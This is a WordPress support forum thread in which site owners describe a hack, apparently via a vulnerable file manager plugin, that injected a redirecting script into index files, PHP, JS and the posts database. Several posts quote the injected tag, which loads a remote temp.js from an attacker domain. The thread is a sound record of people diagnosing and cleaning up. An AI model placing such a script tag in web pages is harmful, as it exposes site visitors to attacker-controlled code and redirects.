Me too, Pro and same malware
same issue here.
I believe need a solution by wordfence team ?
same. it looks like, for me at least, it was an issue with WP file manager https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
Not sure if it can be removed on the instance. If anyone knows how, please advise
Please check if there is a folder named mu-plugins in /wp-content
I this maybe this is the trigger
Doesn’t seem like I have that in /wp-content or /plugins. It still redirects even after deleting wp-file-manager folder from /plugins
same here! what should be done??? this is funny that a security plugin is hacked!
A malicious script is injected into all index files! And it is a huge disruption! Everyone take a look and see if this is true?
the code is
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
🙁
-
This reply was modified 3 years, 10 months ago by
Yui. Reason: please use CODE button for proper formatting
What I believe…
if you have a backup copy … then… delete everything in you host and re install word press and import your recent copy.
this is the fastest way
Regards,
Yes.
The only way to get rid of this seems to be a clean restore. Hopefully I had one. We are all waiting for a comment by the Wordfence team about this issue.
3 week ago we was hacked without wordfence and other redirections. My Pakistan freelancer help me to solf the probs free weeks ago and today too, he work on it. The situation in no longer funny, I go in maintanace mode and wait result. Sometimes I wish me back times with “html” …
One more, more index.php files was hacked outside from WP and implemante a new 1 line. I all delete them and so I better change server ftp access. I inform you what my guy can solf all its probs, today or tomorow.
My guy think, its a out dated plugin ??!!
regards, Helmut
It also infects the wp_post data base, php files an js. It is a complete mess
Last Friday the script was
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
Today it change to
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
also de ns1 changes sometimes to ns5
-
This reply was modified 3 years, 10 months ago by
Yui. Reason: please use CODE button for proper formatting
Hello all, I was working on audiovalves (Hemluts) website.I have completely removed that malicious script from his website and his website is back now. If anyone needs help. I can help. Thank you
audiovalve.info
same issue at exactly time??? I have this on a site I managed Too much times it redirect
-
This reply was modified 3 years, 10 months ago by
ZaacWilliam.
-
This reply was modified 3 years, 10 months ago by
Yui. Reason: link removed
Hi @khubaib927
Before restoring my backup, I removed the script too, from almost 140 index.php files! It was a hectic job but I made it. I was happy… till it came alive again! There seemingly are some other files that I don’t know where they belong to. I looked inside my plugins and I found some weird folders with suspicious files. I just made my decision and restored my website.
I removed the Wordfence plugin too!
anyone with any other solution?